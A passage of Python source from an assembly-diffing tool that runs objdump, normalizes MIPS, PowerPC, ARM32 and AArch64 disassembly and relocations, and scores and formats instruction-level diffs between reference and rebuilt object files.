fail("end address not supported together with -o")
if start.startswith("0"):
fail("numerical start address not supported with -o; pass a function name")
objfile = config.objfile
if not objfile:
objfile, _ = search_map_file(start, project, config)
if not objfile:
fail("Not able to find .o file for function.")
if config.make:
run_make(objfile, project)
if not os.path.isfile(objfile):
fail(f"Not able to find .o file for function: {objfile} is not a file.")
refobjfile = "expected/" + objfile
if not os.path.isfile(refobjfile):
fail(f'Please ensure an OK .o file exists at "{refobjfile}".')
if project.disassemble_all:
disassemble_flag = "-D"
else:
disassemble_flag = "-d"
objdump_flags = [disassemble_flag, "-rz", "-j", config.diff_section]
return (
objfile,
(objdump_flags, refobjfile, start),
(objdump_flags + maybe_get_objdump_source_flags(config), objfile, start),
)
def dump_binary(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.make:
run_make(project.myimg, project)
start_addr = maybe_eval_int(start)
if start_addr is None:
_, start_addr = search_map_file(start, project, config)
if start_addr is None:
fail("Not able to find function in map file.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
objdump_flags = ["-Dz", "-bbinary"] + ["-EB" if config.arch.big_endian else "-EL"]
flags1 = [
f"--start-address={start_addr + config.base_shift}",
f"--stop-address={end_addr + config.base_shift}",
]
flags2 = [f"--start-address={start_addr}", f"--stop-address={end_addr}"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(objdump_flags + flags2, project.myimg, None),
)
# Example: "ldr r4, [pc, #56] ; (4c <AddCoins+0x4c>)"
ARM32_LOAD_POOL_PATTERN = r"(ldr\s+r([0-9]|1[0-3]),\s+\[pc,.*;\s*)(\([a-fA-F0-9]+.*\))"
# The base class is a no-op.
class AsmProcessor:
def __init__(self, config: Config) -> None:
self.config = config
def process_reloc(self, row: str, prev: str) -> str:
return prev
def normalize(self, mnemonic: str, row: str) -> str:
"""This should be called exactly once for each line."""
arch = self.config.arch
row = self._normalize_arch_specific(mnemonic, row)
if self.config.ignore_large_imms and mnemonic not in arch.branch_instructions:
row = re.sub(self.config.arch.re_large_imm, "<imm>", row)
return row
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
return row
def post_process(self, lines: List["Line"]) -> None:
return
class AsmProcessorMIPS(AsmProcessor):
def process_reloc(self, row: str, prev: str) -> str:
arch = self.config.arch
if "R_MIPS_NONE" in row or "R_MIPS_JALR" in row:
# GNU as emits no-op relocations immediately after real ones when
# assembling with -mabi=64. Return without trying to parse 'imm' as an
# integer.
return prev
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if imm != "0":
# MIPS uses relocations with addends embedded in the code as immediates.
# If there is an immediate, show it as part of the relocation. Ideally
# we'd show this addend in both %lo/%hi, but annoyingly objdump's output
# doesn't include enough information to pair up %lo's and %hi's...
# TODO: handle unambiguous cases where all addends for a symbol are the
# same, or show "+???".
mnemonic = prev.split()[0]
if (
mnemonic in arch.instructions_with_address_immediates
and not imm.startswith("0x")
):
imm = "0x" + imm
repl += "+" + imm if int(imm, 0) > 0 else imm
if "R_MIPS_LO16" in row:
repl = f"%lo({repl})"
elif "R_MIPS_HI16" in row:
# Ideally we'd pair up R_MIPS_LO16 and R_MIPS_HI16 to generate a
# correct addend for each, but objdump doesn't give us the order of
# the relocations, so we can't find the right LO16. :(
repl = f"%hi({repl})"
elif "R_MIPS_26" in row:
# Function calls
pass
elif "R_MIPS_PC16" in row:
# Branch to glabel. This gives confusing output, but there's not much
# we can do here.
pass
elif "R_MIPS_GPREL16" in row:
repl = f"%gp_rel({repl})"
elif "R_MIPS_GOT16" in row:
repl = f"%got({repl})"
elif "R_MIPS_CALL16" in row:
repl = f"%call16({repl})"
else:
assert False, f"unknown relocation type '{row}' for line '{prev}'"
return before + repl + after
class AsmProcessorPPC(AsmProcessor):
def process_reloc(self, row: str, prev: str) -> str:
arch = self.config.arch
assert any(
r in row for r in ["R_PPC_REL24", "R_PPC_ADDR16", "R_PPC_EMB_SDA21"]
), f"unknown relocation type '{row}' for line '{prev}'"
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if "R_PPC_REL24" in row:
# function calls
pass
elif "R_PPC_ADDR16_HI" in row:
# absolute hi of addr
repl = f"{repl}@h"
elif "R_PPC_ADDR16_HA" in row:
# adjusted hi of addr
repl = f"{repl}@ha"
elif "R_PPC_ADDR16_LO" in row:
# lo of addr
repl = f"{repl}@l"
elif "R_PPC_ADDR16" in row:
# 16-bit absolute addr
if "+0x7" in repl:
# remove the very large addends as they are an artifact of (label-_SDA(2)_BASE_)
# computations and are unimportant in a diff setting.
if int(repl.split("+")[1], 16) > 0x70000000:
repl = repl.split("+")[0]
elif "R_PPC_EMB_SDA21" in row:
# small data area
pass
return before + repl + after
class AsmProcessorARM32(AsmProcessor):
def process_reloc(self, row: str, prev: str) -> str:
arch = self.config.arch
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
return before + repl + after
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_bl(mnemonic, row)
row = self._normalize_data_pool(row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
return row + "<ignore>"
def _normalize_data_pool(self, row: str) -> str:
pool_match = re.search(ARM32_LOAD_POOL_PATTERN, row)
return pool_match.group(1) if pool_match else row
def post_process(self, lines: List["Line"]) -> None:
lines_by_line_number = {}
for line in lines:
lines_by_line_number[line.line_num] = line
for line in lines:
if line.data_pool_addr is None:
continue
# Add data symbol and its address to the line.
line_original = lines_by_line_number[line.data_pool_addr].original
value = line_original.split()[1]
addr = "{:x}".format(line.data_pool_addr)
line.original = line.normalized_original + f"={value} ({addr})"
class AsmProcessorAArch64(AsmProcessor):
def __init__(self, config: Config) -> None:
super().__init__(config)
self._adrp_pair_registers: Set[str] = set()
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_adrp_differences(mnemonic, row)
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
return row + "<ignore>"
def _normalize_adrp_differences(self, mnemonic: str, row: str) -> str:
"""Identifies ADRP + LDR/ADD pairs that are used to access the GOT and
suppresses any immediate differences.
Whenever an ADRP is seen, the destination register is added to the set of registers
that are part of an ADRP + LDR/ADD pair. Registers are removed from the set as soon
as they are used for an LDR or ADD instruction which completes the pair.
This method is somewhat crude but should manage to detect most such pairs.
"""
row_parts = row.split("\t", 1)
if mnemonic == "adrp":
self._adrp_pair_registers.add(row_parts[1].strip().split(",")[0])
row, _ = split_off_address(row)
return row + "<ignore>"
elif mnemonic == "ldr":
for reg in self._adrp_pair_registers:
# ldr xxx, [reg]
# ldr xxx, [reg, <imm>]
if f", [{reg}" in row_parts[1]:
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
elif mnemonic == "add":
for reg in self._adrp_pair_registers:
# add reg, reg, <imm>
if row_parts[1].startswith(f"{reg}, {reg}, "):
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
return row
@dataclass
class ArchSettings:
name: str
re_int: Pattern[str]
re_comment: Pattern[str]
re_reg: Pattern[str]
re_sprel: Pattern[str]
re_large_imm: Pattern[str]
re_imm: Pattern[str]
re_reloc: Pattern[str]
branch_instructions: Set[str]
instructions_with_address_immediates: Set[str]
forbidden: Set[str] = field(default_factory=lambda: set(string.ascii_letters + "_"))
arch_flags: List[str] = field(default_factory=list)
branch_likely_instructions: Set[str] = field(default_factory=set)
proc: Type[AsmProcessor] = AsmProcessor
big_endian: Optional[bool] = True
delay_slot_instructions: Set[str] = field(default_factory=set)
MIPS_BRANCH_LIKELY_INSTRUCTIONS = {
"beql",
"bnel",
"beqzl",
"bnezl",
"bgezl",
"bgtzl",
"blezl",
"bltzl",
"bc1tl",
"bc1fl",
}
MIPS_BRANCH_INSTRUCTIONS = MIPS_BRANCH_LIKELY_INSTRUCTIONS.union(
{
"b",
"beq",
"bne",
"beqz",
"bnez",
"bgez",
"bgtz",
"blez",
"bltz",
"bc1t",
"bc1f",
}
)
ARM32_PREFIXES = {"b", "bl"}
ARM32_CONDS = {
"",
"eq",
"ne",
"cs",
"cc",
"mi",
"pl",
"vs",
"vc",
"hi",
"ls",
"ge",
"lt",
"gt",
"le",
"al",
}
ARM32_SUFFIXES = {"", ".n", ".w"}
ARM32_BRANCH_INSTRUCTIONS = {
f"{prefix}{cond}{suffix}"
for prefix in ARM32_PREFIXES
for cond in ARM32_CONDS
for suffix in ARM32_SUFFIXES
}
AARCH64_BRANCH_INSTRUCTIONS = {
"b",
"b.eq",
"b.ne",
"b.cs",
"b.hs",
"b.cc",
"b.lo",
"b.mi",
"b.pl",
"b.vs",
"b.vc",
"b.hi",
"b.ls",
"b.ge",
"b.lt",
"b.gt",
"b.le",
"cbz",
"cbnz",
"tbz",
"tbnz",
}
PPC_BRANCH_INSTRUCTIONS = {
"b",
"beq",
"beq+",
"beq-",
"bne",
"bne+",
"bne-",
"blt",
"blt+",
"blt-",
"ble",
"ble+",
"ble-",
"bdnz",
"bdnz+",
"bdnz-",
"bge",
"bge+",
"bge-",
"bgt",
"bgt+",
"bgt-",
}
MIPS_SETTINGS = ArchSettings(
name="mips",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"<.*>"),
re_reg=re.compile(
r"\$?\b(a[0-7]|t[0-9]|s[0-8]|at|v[01]|f[12]?[0-9]|f3[01]|kt?[01]|fp|ra|zero)\b"
),
re_sprel=re.compile(r"(?<=,)([0-9]+|0x[0-9a-f]+)\(sp\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(sp)|%(lo|hi)\([^)]*\)"),
re_reloc=re.compile(r"R_MIPS_"),
arch_flags=["-m", "mips:4300"],
branch_likely_instructions=MIPS_BRANCH_LIKELY_INSTRUCTIONS,
branch_instructions=MIPS_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=MIPS_BRANCH_INSTRUCTIONS.union({"jal", "j"}),
delay_slot_instructions=MIPS_BRANCH_INSTRUCTIONS.union({"j", "jal", "jr", "jalr"}),
proc=AsmProcessorMIPS,
)
MIPSEL_SETTINGS = replace(MIPS_SETTINGS, name="mipsel", big_endian=False)
ARM32_SETTINGS = ArchSettings(
name="arm32",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*>|//.*$)"),
# Includes:
# - General purpose registers: r0..13
    # - Link register and program counter: lr (r14), pc (r15)
# - VFP/NEON registers: s0..31, d0..31, q0..15, fpscr, fpexc, fpsid
# SP should not be in this list.
re_reg=re.compile(
r"\$?\b([rq][0-9]|[rq]1[0-5]|pc|lr|[ds][12]?[0-9]|[ds]3[01]|fp(scr|exc|sid))\b"
),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_reloc=re.compile(r"R_ARM_"),
branch_instructions=ARM32_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=ARM32_BRANCH_INSTRUCTIONS.union({"adr"}),
proc=AsmProcessorARM32,
)
ARMEL_SETTINGS = replace(ARM32_SETTINGS, name="armel", big_endian=False)
AARCH64_SETTINGS = ArchSettings(
name="aarch64",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*>|//.*$)"),
# GPRs and FP registers: X0-X30, W0-W30, [BHSDVQ]0..31
# (FP registers may be followed by data width and number of elements, e.g. V0.4S)
# The zero registers and SP should not be in this list.
re_reg=re.compile(r"\$?\b([bhsdvq]([12]?[0-9]|3[01])(\.\d\d?[bhsdvq])?|[xw][12]?[0-9]|[xw]30)\b"),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_reloc=re.compile(r"R_AARCH64_"),
branch_instructions=AARCH64_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=AARCH64_BRANCH_INSTRUCTIONS.union({"bl", "adrp"}),
proc=AsmProcessorAArch64,
)
PPC_SETTINGS = ArchSettings(
name="ppc",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*>|//.*$)"),
re_reg=re.compile(r"\$?\b([rf][0-9]+)\b"),
re_sprel=re.compile(r"(?<=,)(-?[0-9]+|-?0x[0-9a-f]+)\(r1\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(r1)|[^@]*@(ha|h|lo)"),
re_reloc=re.compile(r"R_PPC_"),
branch_instructions=PPC_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=PPC_BRANCH_INSTRUCTIONS.union({"bl"}),
proc=AsmProcessorPPC,
)
ARCH_SETTINGS = [
MIPS_SETTINGS,
MIPSEL_SETTINGS,
ARM32_SETTINGS,
ARMEL_SETTINGS,
AARCH64_SETTINGS,
PPC_SETTINGS,
]
def hexify_int(row: str, pat: Match[str], arch: ArchSettings) -> str:
full = pat.group(0)
if len(full) <= 1:
# leave one-digit ints alone
return full
start, end = pat.span()
if start and row[start - 1] in arch.forbidden:
return full
if end < len(row) and row[end] in arch.forbidden:
return full
return hex(int(full))
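# Example (hypothetical MIPS line): in "addiu $a0,$a0,100" the trailing "100" is
# rewritten to "0x64", while the "0" inside "$a0" is left alone because it is
# adjacent to a letter (see `forbidden` above). One-digit integers are also kept
# as-is, and the substitution is only applied to mnemonics without address
# immediates.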
def parse_relocated_line(line: str) -> Tuple[str, str, str]:
for c in ",\t ":
if c in line:
ind2 = line.rindex(c)
break
else:
raise Exception(f"failed to parse relocated line: {line}")
before = line[: ind2 + 1]
after = line[ind2 + 1 :]
ind2 = after.find("(")
if ind2 == -1:
imm, after = after, ""
else:
imm, after = after[:ind2], after[ind2:]
if imm == "0x0":
imm = "0"
return before, imm, after
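# Example (hypothetical): "lw\t$a0,0x10($v0)" is split at the last separator into
# before="lw\t$a0,", imm="0x10", after="($v0)"; an imm of "0x0" is canonicalized
# to "0".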
def pad_mnemonic(line: str) -> str:
if "\t" not in line:
return line
mn, args = line.split("\t", 1)
return f"{mn:<7s} {args}"
@dataclass
class Line:
mnemonic: str
diff_row: str
original: str
normalized_original: str
scorable_line: str
line_num: Optional[int] = None
branch_target: Optional[int] = None
data_pool_addr: Optional[int] = None
source_filename: Optional[str] = None
source_line_num: Optional[int] = None
source_lines: List[str] = field(default_factory=list)
comment: Optional[str] = None
def process(dump: str, config: Config) -> List[Line]:
arch = config.arch
processor = arch.proc(config)
skip_next = False
source_lines = []
source_filename = None
source_line_num = None
i = 0
num_instr = 0
data_refs: Dict[int, Dict[str, List[int]]] = defaultdict(lambda: defaultdict(list))
output: List[Line] = []
stop_after_delay_slot = False
lines = dump.split("\n")
while i < len(lines):
row = lines[i]
i += 1
if not row:
continue
if re.match(r"^[0-9a-f]+ <.*>:$", row):
continue
if row.startswith("DATAREF"):
parts = row.split(" ", 3)
text_offset = int(parts[1])
from_offset = int(parts[2])
from_section = parts[3]
data_refs[text_offset][from_section].append(from_offset)
continue
if config.diff_obj and num_instr >= config.max_function_size_lines:
output.append(
Line(
mnemonic="...",
diff_row="...",
original="...",
normalized_original="...",
scorable_line="...",
)
)
break
if not re.match(r"^\s+[0-9a-f]+:\s+", row):
# This regex is conservative, and assumes the file path does not contain "weird"
# characters like colons, tabs, or angle brackets.
if re.match(
r"^[^ \t<>:][^\t<>:]*:[0-9]+( \(discriminator [0-9]+\))?$", row
):
source_filename, _, tail = row.rpartition(":")
source_line_num = int(tail.partition(" ")[0])
source_lines.append(row)
continue
# If the instruction loads a data pool symbol, extract the address of
# the symbol.
data_pool_addr = None
pool_match = re.search(ARM32_LOAD_POOL_PATTERN, row)
if pool_match:
offset = pool_match.group(3).split(" ")[0][1:]
data_pool_addr = int(offset, 16)
m_comment = re.search(arch.re_comment, row)
comment = m_comment[0] if m_comment else None
row = re.sub(arch.re_comment, "", row)
line_num_str = row.split(":")[0]
row = row.rstrip()
tabs = row.split("\t")
row = "\t".join(tabs[2:])
line_num = eval_line_num(line_num_str.strip())
if line_num in data_refs:
refs = data_refs[line_num]
ref_str = "; ".join(
section_name + "+" + ",".join(hex(off) for off in offs)
for section_name, offs in refs.items()
)
output.append(
Line(
mnemonic="<data-ref>",
diff_row="<data-ref>",
original=ref_str,
normalized_original=ref_str,
scorable_line="<data-ref>",
)
)
if "\t" in row:
row_parts = row.split("\t", 1)
else:
# powerpc-eabi-objdump doesn't use tabs
row_parts = [part.lstrip() for part in row.split(" ", 1)]
mnemonic = row_parts[0].strip()
if mnemonic not in arch.instructions_with_address_immediates:
row = re.sub(arch.re_int, lambda m: hexify_int(row, m, arch), row)
# Let 'original' be 'row' with relocations applied, while we continue
# transforming 'row' into a coarser version that ignores registers and
# immediates.
original = row
while i < len(lines):
reloc_row = lines[i]
if re.search(arch.re_reloc, reloc_row):
original = processor.process_reloc(reloc_row, original)
else:
break
i += 1
normalized_original = processor.normalize(mnemonic, original)
scorable_line = normalized_original
if not config.score_stack_differences:
scorable_line = re.sub(arch.re_sprel, "addr(sp)", scorable_line)
if mnemonic in arch.branch_instructions:
# Replace the final argument with "<target>"
scorable_line = re.sub(r"[^, \t]+$", "<target>", scorable_line)
if skip_next:
skip_next = False
row = "<delay-slot>"
mnemonic = "<delay-slot>"
scorable_line = "<delay-slot>"
if mnemonic in arch.branch_likely_instructions:
skip_next = True
row = re.sub(arch.re_reg, "<reg>", row)
row = re.sub(arch.re_sprel, "addr(sp)", row)
row_with_imm = row
if mnemonic in arch.instructions_with_address_immediates:
row = row.strip()
row, _ = split_off_address(row)
row += "<imm>"
else:
row = normalize_imms(row, arch)
branch_target = None
if mnemonic in arch.branch_instructions:
branch_target = int(row_parts[1].strip().split(",")[-1], 16)
output.append(
Line(
mnemonic=mnemonic,
diff_row=row,
original=original,
normalized_original=normalized_original,
scorable_line=scorable_line,
line_num=line_num,
branch_target=branch_target,
data_pool_addr=data_pool_addr,
source_filename=source_filename,
source_line_num=source_line_num,
source_lines=source_lines,
comment=comment,
)
)
num_instr += 1
source_lines = []
if config.stop_jrra and mnemonic == "jr" and row_parts[1].strip() == "ra":
stop_after_delay_slot = True
elif stop_after_delay_slot:
break
processor.post_process(output)
return output
def normalize_imms(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_imm, "<imm>", row)
def normalize_stack(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_sprel, "addr(sp)", row)
def imm_matches_everything(row: str, arch: ArchSettings) -> bool:
# (this should probably be arch-specific)
return "(." in row
def split_off_address(line: str) -> Tuple[str, str]:
"""Split e.g. 'beqz $r0,1f0' into 'beqz $r0,' and '1f0'."""
parts = line.split(",")
if len(parts) < 2:
parts = line.split(None, 1)
off = len(line) - len(parts[-1])
return line[:off], line[off:]
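# The no-comma case is handled too: a (hypothetical) "jal\t80001234" splits into
# "jal\t" and "80001234".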
def diff_sequences_difflib(
seq1: List[str], seq2: List[str]
) -> List[Tuple[str, int, int, int, int]]:
differ = difflib.SequenceMatcher(a=seq1, b=seq2, autojunk=False)
return differ.get_opcodes()
def diff_sequences(
seq1: List[str], seq2: List[str], algorithm: str
) -> List[Tuple[str, int, int, int, int]]:
if (
algorithm != "levenshtein"
or len(seq1) * len(seq2) > 4 * 10 ** 8
or len(seq1) + len(seq2) >= 0x110000
):
return diff_sequences_difflib(seq1, seq2)
# The Levenshtein library assumes that we compare strings, not lists. Convert.
# (Per the check above we know we have fewer than 0x110000 unique elements, so chr() works.)
remapping: Dict[str, str] = {}
def remap(seq: List[str]) -> str:
seq = seq[:]
for i in range(len(seq)):
val = remapping.get(seq[i])
if val is None:
val = chr(len(remapping))
remapping[seq[i]] = val
seq[i] = val
return "".join(seq)
rem1 = remap(seq1)
rem2 = remap(seq2)
import Levenshtein
ret: List[Tuple[str, int, int, int, int]] = Levenshtein.opcodes(rem1, rem2)
return ret
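# Illustration of the remapping above: ["addiu", "lw", "addiu"] becomes the
# string "\x00\x01\x00" (each distinct element mapped to one character), so the
# Levenshtein library can diff it like ordinary text.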
def diff_lines(
lines1: List[Line],
lines2: List[Line],
algorithm: str,
) -> List[Tuple[Optional[Line], Optional[Line]]]:
ret = []
for (tag, i1, i2, j1, j2) in diff_sequences(
[line.mnemonic for line in lines1],
[line.mnemonic for line in lines2],
algorithm,
):
for line1, line2 in itertools.zip_longest(lines1[i1:i2], lines2[j1:j2]):
if tag == "replace":
if line1 is None:
tag = "insert"
elif line2 is None:
tag = "delete"
elif tag == "insert":
assert line1 is None
elif tag == "delete":
assert line2 is None
ret.append((line1, line2))
return ret
def score_diff_lines(
lines: List[Tuple[Optional[Line], Optional[Line]]], config: Config
) -> int:
# This logic is copied from `scorer.py` from the decomp permuter project
# https://github.com/simonlindholm/decomp-permuter/blob/main/src/scorer.py
score = 0
deletions = []
insertions = []
def lo_hi_match(old: str, new: str) -> bool:
# TODO: Make this arch-independent, like `imm_matches_everything()`
old_lo = old.find("%lo")
old_hi = old.find("%hi")
new_lo = new.find("%lo")
new_hi = new.find("%hi")
if old_lo != -1 and new_lo != -1:
old_idx = old_lo
new_idx = new_lo
elif old_hi != -1 and new_hi != -1:
old_idx = old_hi
new_idx = new_hi
else:
return False
if old[:old_idx] != new[:new_idx]:
return False
old_inner = old[old_idx + 4 : -1]
new_inner = new[new_idx + 4 : -1]
return old_inner.startswith(".") or new_inner.startswith(".")
def diff_sameline(old: str, new: str) -> None:
nonlocal score
if old == new:
return
if lo_hi_match(old, new):
return
ignore_last_field = False
if config.score_stack_differences:
oldsp = re.search(config.arch.re_sprel, old)
newsp = re.search(config.arch.re_sprel, new)
if oldsp and newsp:
oldrel = int(oldsp.group(1) or "0", 0)
newrel = int(newsp.group(1) or "0", 0)
score += abs(oldrel - newrel) * config.penalty_stackdiff
ignore_last_field = True
# Probably regalloc difference, or signed vs unsigned
# Compare each field in order
newfields, oldfields = new.split(","), old.split(",")
if ignore_last_field:
newfields = newfields[:-1]
oldfields = oldfields[:-1]
for nf, of in zip(newfields, oldfields):
if nf != of:
score += config.penalty_regalloc
# Penalize any extra fields
score += abs(len(newfields) - len(oldfields)) * config.penalty_regalloc
def diff_insert(line: str) -> None:
# Reordering or totally different codegen.
# Defer this until later when we can tell.
insertions.append(line)
def diff_delete(line: str) -> None:
deletions.append(line)
# Find the end of the last long streak of matching mnemonics, if it looks
# like the objdump output was truncated. This is used to skip scoring
# misaligned lines at the end of the diff.
last_mismatch = -1
max_index = None
lines_were_truncated = False
for index, (line1, line2) in enumerate(lines):
if (line1 and line1.original == "...") or (line2 and line2.original == "..."):
lines_were_truncated = True
if line1 and line2 and line1.mnemonic == line2.mnemonic:
if index - last_mismatch >= 50:
max_index = index
else:
last_mismatch = index
if not lines_were_truncated:
max_index = None
for index, (line1, line2) in enumerate(lines):
if max_index is not None and index > max_index:
break
if line1 and line2 and line1.mnemonic == line2.mnemonic:
diff_sameline(line1.scorable_line, line2.scorable_line)
else:
if line1:
diff_delete(line1.scorable_line)
if line2:
diff_insert(line2.scorable_line)
insertions_co = Counter(insertions)
deletions_co = Counter(deletions)
for item in insertions_co + deletions_co:
ins = insertions_co[item]
dels = deletions_co[item]
common = min(ins, dels)
score += (
(ins - common) * config.penalty_insertion
+ (dels - common) * config.penalty_deletion
+ config.penalty_reordering * common
)
return score
@dataclass(frozen=True)
class OutputLine:
base: Optional[Text] = field(compare=False)
fmt2: Text = field(compare=False)
key2: Optional[str]
boring: bool = field(compare=False)
is_data_ref: bool = field(compare=False)
line1: Optional[Line] = field(compare=False)
line2: Optional[Line] = field(compare=False)
@dataclass(frozen=True)
class Diff:
lines: List[OutputLine]
score: int
max_score: int
def trim_nops(lines: List[Line], arch: ArchSettings) -> List[Line]:
lines = lines[:]
while lines and lines[-1].mnemonic == "nop" and (len(lines) == 1 or lines[-2].mnemonic not in arch.delay_slot_instructions):
lines.pop()
return lines
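# e.g. trailing alignment "nop"s at the end of a MIPS function are dropped, but a
# "nop" sitting in the delay slot of a final "jr ra" is kept, since it is part of
# the function body.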
def do_diff(lines1: List[Line], lines2: List[Line], config: Config) -> Diff:
if config.show_source:
import cxxfilt
arch = config.arch
fmt = config.formatter
output: List[OutputLine] = []
sc1 = symbol_formatter("base-reg", 0)
sc2 = symbol_formatter("my-reg", 0)
sc3 = symbol_formatter("base-stack", 4)
sc4 = symbol_formatter("my-stack", 4)
sc5 = symbol_formatter("base-branch", 0)
sc6 = symbol_formatter("my-branch", 0)
bts1: Set[int] = set()
bts2: Set[int] = set()
if config.show_branches:
for (lines, btset, sc) in [
(lines1, bts1, sc5),
(lines2, bts2, sc6),
]:
for line in lines:
bt = line.branch_target
if bt is not None:
btset.add(bt)
sc(str(bt))
lines1 = trim_nops(lines1, arch)
lines2 = trim_nops(lines2, arch)
diffed_lines = diff_lines(lines1, lines2, config.algorithm)
score = score_diff_lines(diffed_lines, config)
max_score = len(lines1) * config.penalty_deletion
line_num_base = -1
line_num_offset = 0
line_num_2to1 = {}
for (line1, line2) in diffed_lines:
if line1 is not None and line1.line_num is not None:
line_num_base = line1.line_num
line_num_offset = 0
else:
line_num_offset += 1
if line2 is not None and line2.line_num is not None:
line_num_2to1[line2.line_num] = (line_num_base, line_num_offset)
for (line1, line2) in diffed_lines:
line_color1 = line_color2 = sym_color = BasicFormat.NONE
line_prefix = " "
is_data_ref = False
out1 = Text() if not line1 else Text(pad_mnemonic(line1.original))
out2 = Text() if not line2 else Text(pad_mnemonic(line2.original))
if line1 and line2 and line1.diff_row == line2.diff_row:
if line1.diff_row == "<data-ref>":
if line1.normalized_original != line2.normalized_original:
line_prefix = "i"
sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(sym_color)
out2 = out2.reformat(sym_color)
is_data_ref = True
elif (
line1.normalized_original == line2.normalized_original
and line2.branch_target is None
):
# Fast path: no coloring needed. We don't include branch instructions
# in this case because we need to check that their targets line up in
# the diff, and don't just happen to have the same address
# by accident.
pass
elif line1.diff_row == "<delay-slot>":
# Don't draw attention to differing branch-likely delay slots: they
# typically mirror the branch destination - 1 so the real difference
# is elsewhere. Still, do mark them as different to avoid confusion.
# No need to consider branches because delay slots can't branch.
out1 = out1.reformat(BasicFormat.DELAY_SLOT)
out2 = out2.reformat(BasicFormat.DELAY_SLOT)
else:
mnemonic = line1.original.split()[0]
branchless1, address1 = out1.plain(), ""
branchless2, address2 = out2.plain(), ""
if mnemonic in arch.instructions_with_address_immediates:
branchless1, address1 = split_off_address(branchless1)
branchless2, address2 = split_off_address(branchless2)
out1 = Text(branchless1)
out2 = Text(branchless2)
out1, out2 = format_fields(
arch.re_imm, out1, out2, lambda _: BasicFormat.IMMEDIATE
)
if line2.branch_target is not None:
target = line2.branch_target
line2_target = line_num_2to1.get(line2.branch_target)
if line2_target is None:
# If the target is outside the disassembly, extrapolate.
# This only matters near the bottom.
assert line2.line_num is not None
line2_line = line_num_2to1[line2.line_num]
line2_target = (line2_line[0] + (target - line2.line_num), 0)
# Set the key for three-way diffing to a normalized version.
norm2, norm_branch2 = split_off_address(line2.normalized_original)
if norm_branch2 != "<ign>":
line2.normalized_original = norm2 + str(line2_target)
same_target = line2_target == (line1.branch_target, 0)
else:
# Do a naive comparison for non-branches (e.g. function calls).
same_target = address1 == address2
if normalize_imms(branchless1, arch) == normalize_imms(
branchless2, arch
):
if imm_matches_everything(branchless2, arch):
# ignore differences due to %lo(.rodata + ...) vs symbol
out1 = out1.reformat(BasicFormat.NONE)
out2 = out2.reformat(BasicFormat.NONE)
elif line2.branch_target is not None and same_target:
# same-target branch, don't color
pass
else:
# must have an imm difference (or else we would have hit the
# fast path)
sym_color = BasicFormat.IMMEDIATE
line_prefix = "i"
else:
out1, out2 = format_fields(arch.re_sprel, out1, out2, sc3, sc4)
if normalize_stack(branchless1, arch) == normalize_stack(
branchless2, arch
):
# only stack differences (luckily stack and imm
# differences can't be combined in MIPS, so we
# don't have to think about that case)
sym_color = BasicFormat.STACK
line_prefix = "s"
else:
# reg differences and maybe imm as well
out1, out2 = format_fields(arch.re_reg, out1, out2, sc1, sc2)
line_color1 = line_color2 = sym_color = BasicFormat.REGISTER
line_prefix = "r"
if same_target:
address_imm_fmt = BasicFormat.NONE
else:
address_imm_fmt = BasicFormat.IMMEDIATE
out1 += Text(address1, address_imm_fmt)
out2 += Text(address2, address_imm_fmt)
elif line1 and line2:
line_prefix = "|"
line_color1 = line_color2 = sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(line_color1)
out2 = out2.reformat(line_color2)
elif line1:
line_prefix = "<"
line_color1 = sym_color = BasicFormat.DIFF_REMOVE
out1 = out1.reformat(line_color1)
out2 = Text()
elif line2:
line_prefix = ">"
line_color2 = sym_color = BasicFormat.DIFF_ADD
out1 = Text()
out2 = out2.reformat(line_color2)
if config.show_source and line2 and line2.comment:
out2 += f" {line2.comment}"
def format_part(
out: Text,
line: Optional[Line],
line_color: Format,
btset: Set[int],
sc: FormatFunction,
) -> Optional[Text]:
